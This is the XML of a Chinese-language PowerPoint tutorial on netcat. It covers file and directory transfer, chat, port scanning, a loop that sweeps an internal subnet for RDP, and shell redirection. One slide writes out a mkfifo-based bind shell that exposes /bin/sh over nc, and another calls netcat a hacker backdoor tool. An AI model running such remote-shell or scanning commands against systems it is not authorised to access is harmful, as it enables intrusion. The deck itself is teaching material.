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8" r:id="rId4"/>
    <p:sldId id="320" r:id="rId5"/>
    <p:sldId id="321" r:id="rId6"/>
    <p:sldId id="257" r:id="rId7"/>
    <p:sldId id="322" r:id="rId8"/>
    <p:sldId id="304" r:id="rId9"/>
    <p:sldId id="306" r:id="rId10"/>
    <p:sldId id="323" r:id="rId11"/>
    <p:sldId id="324" r:id="rId12"/>
    <p:sldId id="326" r:id="rId13"/>
    <p:sldId id="327" r:id="rId14"/>
    <p:sldId id="329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895B-3F8E-4F4A-9983-40540C1AA358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9F1-ECD7-44D3-AE9A-DACF7B0B2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47D-FBE0-44D6-ABD1-8512EEB70B58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D9F-5334-44C3-8F18-AB77A49CEBFA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04-DA21-42D1-9CFF-3CC82F820E58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47D-FBE0-44D6-ABD1-8512EEB70B5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4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890E-A729-4E17-A250-7FD3503D913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2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0DF-608B-43C4-9E1A-F55735D3A2AB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7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B012-0FF9-4256-9261-412DE750380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AF7-768D-4D29-8BC5-EFB5CBDF64B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73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4A0-E5F4-4330-852E-858E0F47D2F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11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07B-E398-4D5C-B53A-38314542C38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78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2B68-BFCB-4BFC-BA7C-5922AC8E72D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5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890E-A729-4E17-A250-7FD3503D913A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9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CA4E-95F5-45BA-95B7-1C6EE7CA789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D9F-5334-44C3-8F18-AB77A49CEBF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70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04-DA21-42D1-9CFF-3CC82F820E5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0DF-608B-43C4-9E1A-F55735D3A2AB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B012-0FF9-4256-9261-412DE750380A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AF7-768D-4D29-8BC5-EFB5CBDF64BC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4A0-E5F4-4330-852E-858E0F47D2F6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07B-E398-4D5C-B53A-38314542C382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2B68-BFCB-4BFC-BA7C-5922AC8E72DC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CA4E-95F5-45BA-95B7-1C6EE7CA7894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70F-5A90-4095-9405-D50B51318EEF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70F-5A90-4095-9405-D50B51318EE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8383-A619-44E8-BE6B-A1E777599D2E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文件传输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0" y="1744479"/>
            <a:ext cx="8037690" cy="5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 -l 6789 &lt; test.txt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649110" y="2661761"/>
            <a:ext cx="8037690" cy="5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192.168.0.26 6789 &gt; test.txt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49110" y="4707314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 -cvf - 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folder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649110" y="5624596"/>
            <a:ext cx="8037690" cy="5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 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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xvf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17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="649110" y="3856546"/>
            <a:ext cx="803769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我们一样可以目录传输：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0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各种各样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0" y="2044594"/>
            <a:ext cx="775530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数据压缩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bzip2</a:t>
            </a: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数据加密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mcrypt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流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数据传输，视频播放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扫描内网所有端口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等等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0" y="4671494"/>
            <a:ext cx="8037690" cy="435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i in {1..255};  do nc -z -w 1 -n 192.168.0.$i 3389; done</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="20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8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终极大招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0" y="2143447"/>
            <a:ext cx="8037690" cy="8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mkfifo /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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tmp/tmp_fifo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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/tmp/tmp_fifo | /bin/sh -i 2&gt;&amp;1 | nc -l </a:t>
            </a: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6789</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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pl-PL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/tmp/tmp_fifo</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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49110" y="3573318"/>
            <a:ext cx="8037690" cy="40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 -n 192.168.0.26 </a:t>
            </a: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6789</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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小知识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点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0" y="3920964"/>
            <a:ext cx="8037690" cy="26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command 2&gt;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errfile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zh-CN" altLang="en-US" sz="12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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz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重定向到文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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errfile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="12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command 2&gt;&amp;1 | </a:t>
            </a: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zh-CN" altLang="en-US" sz="12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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz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重定向到标准输出，错误和标准输出都通过管道传给下个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="12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en-US" altLang="zh-CN" sz="12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command 3&gt;&amp;2 2&gt;&amp;1 1&gt;&amp;3 | </a:t>
            </a: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zh-CN" altLang="en-US" sz="12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en-US" sz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标准输出和错误输出的交换。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="12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 text.txt 2&gt;&amp;1 &gt; file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 text.txt &gt; file 2&gt;&amp;1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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649110" y="2044594"/>
            <a:ext cx="775530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的输入为键盘，但是也可以来自文件或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管道。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的输出为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终端，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但是也可以重定向到文件，管道或后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引号。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的错误输出到终端，但是也可以重定向到文件。</a:t>
            </a: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的输入，输出和错误输出分别表示为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STDIN,STDOUT,STDERR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，也可以用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来表示。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8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优缺点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649110" y="2044594"/>
            <a:ext cx="204030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稳定</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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无并发</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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3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731" y="4681157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Shy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  /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Web</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:cs typeface="华文黑体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="75C1FF"/>
                </a:solidFill>
                <a:latin typeface="Myriad Pro"/>
                <a:cs typeface="Myriad Pro"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="75C1FF"/>
              </a:solidFill>
              <a:latin typeface="Myriad Pro"/>
              <a:cs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379" y="2014482"/>
            <a:ext cx="685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华文黑体"/>
              </a:rPr>
              <a:t>网络工具中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="48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华文黑体"/>
              </a:rPr>
              <a:t>的瑞士军刀</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean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35F1-B622-4705-A7AC-5F064AA57F14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什么是</a:t>
            </a:r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nc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859780" y="2044593"/>
            <a:ext cx="5160020" cy="401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NetCat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在网络中读写数据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2050" name="Picture 2" descr="https://i.imgur.com/gHw2Q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96" y="3711389"/>
            <a:ext cx="4411904" cy="22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充满想象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859779" y="2044593"/>
            <a:ext cx="798838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netcat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所做的就是在两台电脑之间建立链接并返回两个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数据流。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="http://i3.sinaimg.cn/IT/2012/1127/U2727P2DT20121127074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77" y="3249245"/>
            <a:ext cx="3590925" cy="26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瑞士军刀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/>
              <a:pPr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17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="649110" y="2044594"/>
            <a:ext cx="376152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数据传输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端口监听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扫描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调试和探测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聊天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黑客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的后门工具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http://shop.52zjk.cn/Uploads/pro/d/528864e6c97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77583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主要功能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0" y="2044594"/>
            <a:ext cx="775530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支持连出和连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入，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，任意源和目的端口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全部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DNS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正向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反向检查，给出恰当的警告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任何本地设置的网络源地址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建端口扫描功能，带有随机数发生器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loose source-routing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功能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慢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发送模式，可以每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秒发送一行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进制显示传送或接收的数据。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使用帮助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12" y="1761566"/>
            <a:ext cx="7858547" cy="43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端口扫描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0" y="1744479"/>
            <a:ext cx="8037690" cy="5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 -z -v -n 192.168.0.27 20-30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0" y="2576109"/>
            <a:ext cx="8037690" cy="105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参数告诉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netcat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 IO,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连接成功后立即关闭连接， 不进行数据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参数指使用冗余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选项，即详细输出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不使用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反向查询，指定数字的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地址，不能用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hostname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649110" y="5045166"/>
            <a:ext cx="8037690" cy="5730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 -z -v -n 192.168.0.27 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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20-30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49110" y="4245720"/>
            <a:ext cx="803769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不建议主讲人这么做：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1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聊天工具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0" y="1744479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pl-PL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 –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6789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0" y="3618265"/>
            <a:ext cx="8037690" cy="7325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6789</a:t>
            </a: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</a:t>
            </a:r>
            <a:r>
              <a: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启动了一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="16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Server</a:t>
            </a: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所有的标准输出和输入会输出到该</a:t>
            </a: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端口，并在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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中展示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649110" y="2661761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pl-PL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6789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649110" y="5112825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pl-PL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–u 192.168.0.26 5166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552</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)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</cp:lastModifiedBy>
  <cp:revision>161</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-12-28T03:29:05Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-11-24T12:41:49Z</dcterms:modified>
</cp:coreProperties>
</file>